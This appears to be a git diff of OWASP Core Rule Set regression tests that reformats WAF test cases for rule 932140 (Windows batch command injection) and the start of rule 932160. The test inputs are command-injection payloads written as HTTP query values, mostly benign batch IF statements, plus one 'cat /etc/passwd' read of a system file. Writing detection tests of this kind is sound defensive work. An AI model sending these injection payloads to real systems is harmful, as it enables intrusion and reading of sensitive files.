"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+NOT+1%3D%3D2+++++++++++++++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 96 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25_prefix%25%3D%3DSS6+++++++++GOTO+they_matched" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 97 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%5B%251%5D%3D%3D%5B%5D+++++++++++++++ECHO+Value+Missing" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 98 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%5B%251%5D+EQU+%5B%5D++++++++++++ECHO+Value+Missing" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 99 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%282+GEQ+15%29+++++++++++++echo+%22bigger%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 100 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++red%3D%3Dred+++++++++++++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 101 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+red%3D%3D%3Dred++++++++++++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 102 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+++++Red%3D%3Dred+++++++++++++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 103 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%281%29+equ+%281%29+echo+hey" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 104 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%282+equ+2%29+echo+hey" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 105 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25VAR%25%22%3D%3D%25%25A+do+echo+true" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 106 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25%7E1%22+%3D%3D+%22%25%7E2%22+%28EXIT+%2FB+0%29+ELSE+%28EXIT+%2FB+1%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 107 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%25n1%25+gtr+%25n2%25+echo+%25n1%25+is+greater+than+%25n2%25" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 108 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%25n1%25+lss+%25n2%25+echo+%25n1%25+is+less+than+%25n2%25" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 109 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%25n1%25+equ+%25n2%25+echo+%25n1%25+is+equal+to+%25n2%25" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 110 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25n1%25%22+gtr+%22%25n2%25%22+echo+%22%25n1%25%22+is+greater+than+%22%25n2%25%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 111 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25n1%25%22+lss+%22%25n2%25%22+echo+%22%25n1%25%22+is+less+than+%22%25n2%25%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 112 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25n1%25%22+equ+%22%25n2%25%22+echo+%22%25n1%25%22+is+equal+to+%22%25n2%25%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 113 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+defined+n1+set+%22n1%3D0%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 114 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+X%251%3D%3DX%2F%3F+GOTO+Helpscreen" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 115 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%251%22%3D%3D%22%2F%3F%22+..." + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 116 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%5B%251%5D%3D%3D%5B%2F%3F%5D+..." + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 117 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25%7E1%22%3D%3D%22%2F%3F%22+..." + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 118 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+ERRORLEVEL+3+IF+NOT+ERRORLEVEL+4+..." + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 119 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+NOT+DEFINED+BAR+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 120 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22before%22+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 121 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22after%22+%40echo+ok" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 122 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%21VAR%21%22+%3D%3D+%22after%22+%40echo+ok" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 123 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+defined+BAR+set+FOO%3D1%26+echo+FOO%3A+%25FOO%25" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 124 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%28%251%29%3D%3D%28LTRS%29+CD+C%3A%5CWORD%5CLTRS" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 125 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%251%22%3D%3D%22%22+goto+ERROR" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 126 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%28AA%29+%3D%3D+%28AA%29+echo+same" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 127 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%5BAA%5D+%3D%3D+%5BAA%5D+echo+same" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 128 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22A+A%22+%3D%3D+%22A+A%22+echo+same" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 129 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%25_prog%3A%7E-1%25+NEQ+%5C+%28Set+_prog%3D%25_prog%25%5C%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 130 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+EXIST+%22temp.txt%22+ECHO+found" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 131 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+NOT+EXIST+%22temp.txt%22+ECHO+not+found" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 132 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22%22+%28SET+var%3Ddefault+value%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 133 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+NOT+DEFINED+var+%28SET+var%3Ddefault+value%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 134 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22Hello%2C+World%21%22+%28ECHO+found%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 135 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22%3D%3D%22hello%2C+world%21%22+%28+ECHO+found+%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 136 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+EQU+%221%22+ECHO+equality+with+1" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 137 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+NEQ+%220%22+ECHO+inequality+with+0" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 138 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+GEQ+%221%22+ECHO+greater+than+or+equal+to+1" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 139 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+LEQ+%221%22+ECHO+less+than+or+equal+to+1" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 140 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25ERRORLEVEL%25%22+NEQ+%220%22+%28ECHO+execution+failed%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 141 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%251+%3D%3D+%22%22+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 142 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%22%251%22+%3D%3D+%22%22+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 143 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%7B%251%7D+%3D%3D+%7B%7D" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 144 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%22A%251%22+%3D%3D+%22A%22+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 145 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+DEFINED+ARG+%28echo+%22It+is+defined%3A+%251%22%29+ELSE+%28echo+%22%25%251+is+not+defined%22%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 146 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if3q+hfy6e8egfxsjtewc838gsfbhwvw9qzfty3gjs86syg7y6mrpwgw4ekureakjpk6%2Flyghe9pnfekpw2yt8svzseinhs1rbkuu%2Fzq15u5wh8nj8dd+fn86qcdwzv3s9hw35e14pxgcv34dhmt1mwbxnicwudjawfqz+fphmr5vlnufdihoffpuvqwkcmom61i3lisyxg65fx+rgbnrs6e4pmbvy2xl+vwb8oct23cyypregi638dkychllvvw5kq7rolfbhk3hojxz9tthunqky9dodqbb6u8roh+firwx8kuf1dfgewcto9eljhuaoqgdk4qwxlziktaf1mw2atcmw7jvzsh1s0kngiepps54lj4wtcbfzfvbqb7y3caffhnvfrm3tbjxlywqakfqxoprh7yooguat5flg2ozx5%2Fafn7w%3D%3D" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932140] + - test_id: 147 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 148 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if%2Fi+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 149 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 150 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+%22a%22%3D%3D%22b%22++foo" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 151 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+not++%22a%22%3D%3D%22b%22++foo" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 152 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+++exist+StorageServer.port+echo+yay" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 153 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%2Fi+exist+StorageServer.port+echo+yay" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 154 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=ifq+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932140] + - test_id: 155 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=iffoo+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932140] + - test_id: 156 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if3+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932140] + - test_id: 157 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if3q+a%3D%3Db+foo" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932140] + - test_id: 158 desc: | FP when using `t:urlDecodeUni`. Using `t:urlDecodeUni` removes the `+` from the encoded value in the XML document, which produced a false positive match. See https://github.com/coreruleset/coreruleset/issues/1785 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: if+foo== - output: - no_log_contains: id "932140" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: if+foo== + output: + log: + no_expect_ids: [932140] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml index 300ea3657..c2a0a6344 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml @@ -1,236 +1,234 @@ --- meta: author: "Paul Beckett, Esad Cetiner, azurit" - enabled: true - name: "932160.yaml" - description: "Tests to trigger or not trigger rule 932160" +rule_id: 932160 tests: - - test_title: 932160-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932160-1=cat%20/etc/passwd" - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: 